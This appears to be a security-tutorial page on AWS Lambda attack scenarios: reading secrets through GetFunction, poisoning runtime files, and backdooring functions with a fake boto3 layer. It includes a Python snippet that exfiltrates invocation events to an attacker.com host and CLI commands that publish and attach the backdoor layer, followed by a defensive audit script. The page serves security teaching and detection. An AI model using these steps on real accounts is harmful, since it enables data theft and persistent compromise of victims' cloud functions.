
# Lambda - Security

Following are some interesting security scenarios:

### Scenario I - Env Variables

If you have obtained keys with the `GetFunction` permission, you can view the environment variables of a Lambda function and even download the function code (the `Code.Location` field of the response is a pre-signed URL for the deployment package).

Permission needed: `GetFunction`

Command:

```
aws lambda get-function --function-name testDemo
```

The output contains all the environment variables configured on the function, in clear text.

![Get-Function Lambda](/files/GJ5qF5Zuli4OjPf37BA5)

### Scenario II - Runtime Leakage

We have successfully compromised a Lambda function that runs once every 10 minutes and want to leak all the events passed to it.

There are two ways to poison a Lambda function:

* If the function code imports any library, we can poison that library under `/var/runtime`, since libraries there are loaded every time the function is executed.
* If the main function code has no imports, poison the bootstrap file at `/var/runtime/bootstrap.py`, since the init process loads this file on every execution.

The simplest way to leak the event is to add a couple of lines:

```
import urllib3
http = urllib3.PoolManager()

# Fetch the current invocation event from the local Runtime API
data = http.request('GET', 'http://127.0.0.1:9001/2018-06-01/runtime/invocation/next').data
# Forward the event to the attacker-controlled server
http.request('POST', 'http://attacker.com/event', body=data)
```

The code above queries the Runtime API for the current event and posts the data to the attacker's server, thereby exfiltrating the event.

### Scenario III - Layer Backdoor

We have compromised a Lambda function with full access to it and now want to backdoor it. To do so, we can add a malicious layer to the function.

#### Creating a Layer

To create a layer, we first need a malicious file that the legitimate function code will later import. For Python, we create a zip containing the malicious file under the directory path `python/lib/python3.9/site-packages/`.

![Zipping a layer](/files/LGKi2RabkhFE50rP1W5D)

In the example above we created a malicious zip file whose module masquerades as boto3. Next, we publish a new Lambda layer from that zip file:

```
aws lambda publish-layer-version --layer-name MyLayer --description "Backdoor layer" --license-info "MIT" --zip-file fileb:///layer.zip --compatible-runtimes python3.9 --compatible-architectures "x86_64" --region us-east-2
```

#### Attach layer to Function

Once the layer is published, attach it to the target function (a layer version ARN has the form `arn:aws:lambda:<region>:<account>:layer:<name>:<version>`):

```
aws lambda update-function-configuration --function-name securitylabs-lambda --layers arn:aws:lambda:us-east-2:123456789012:layer:MyLayer:1
```

Now, whenever the function is executed, the layer code is loaded and runs before the actual function code, backdooring the function.
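From the defender's side, both Scenario I and Scenario III leave traces in the same place: the function configuration that `aws lambda get-function` returns. The following added example (not part of the original page) audits that `Configuration` object for secret-looking environment variables and for layers published from accounts outside an allowlist; the sample configuration, the `SECRET_NAME` pattern and the trusted-account set are constructed assumptions.

```python
# Added example: audit a Lambda "Configuration" object (as returned by
# `aws lambda get-function`) for the footholds described above:
#   Scenario I  - secrets stored in environment variables
#   Scenario III - layers published by an account you do not control
# The input below is a constructed sample so the script runs offline.
import json
import re

# Layer version ARN: arn:aws:lambda:<region>:<account>:layer:<name>:<version>
LAYER_ARN = re.compile(
    r"^arn:aws:lambda:(?P<region>[a-z0-9-]+):(?P<account>\d{12})"
    r":layer:(?P<name>[^:]+):(?P<version>\d+)$"
)
# Variable names that commonly hold credentials (assumed starting list, not exhaustive)
SECRET_NAME = re.compile(r"(SECRET|PASSWORD|PASSWD|TOKEN|API_?KEY|PRIVATE_KEY)", re.I)


def audit_function_config(cfg, trusted_accounts):
    """Return a list of (severity, message) findings for one function configuration."""
    findings = []
    name = cfg.get("FunctionName", "<unknown>")

    # Scenario I: anyone holding lambda:GetFunction reads these values in clear text.
    for key in cfg.get("Environment", {}).get("Variables", {}):
        if SECRET_NAME.search(key):
            findings.append(("HIGH", f"{name}: env var {key} looks like a secret; "
                                     "store it in Secrets Manager or SSM instead"))

    # Scenario III: a layer from an untrusted account is loaded before the function code.
    for layer in cfg.get("Layers", []):
        arn = layer.get("Arn", "")
        m = LAYER_ARN.match(arn)
        if not m:
            findings.append(("MEDIUM", f"{name}: unparseable layer ARN {arn!r}"))
        elif m.group("account") not in trusted_accounts:
            findings.append(("HIGH", f"{name}: layer {m.group('name')}:{m.group('version')} "
                                     f"published by untrusted account {m.group('account')}"))
    return findings


# Constructed sample; account 123456789012 mirrors the placeholder used on this page.
SAMPLE_CONFIG = json.loads("""{
  "FunctionName": "securitylabs-lambda",
  "Environment": {"Variables": {"DB_PASSWORD": "hunter2", "LOG_LEVEL": "info"}},
  "Layers": [{"Arn": "arn:aws:lambda:us-east-2:123456789012:layer:MyLayer:1"}]
}""")

if __name__ == "__main__":
    for severity, message in audit_function_config(SAMPLE_CONFIG, {"111111111111"}):
        print(severity, message)
```

In practice, pipe `aws lambda get-function --function-name <name> --query Configuration` into `audit_function_config` for every function in the account and alert on any HIGH finding.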

![](/files/ZjKE0eod80w2OkqhUaFc)
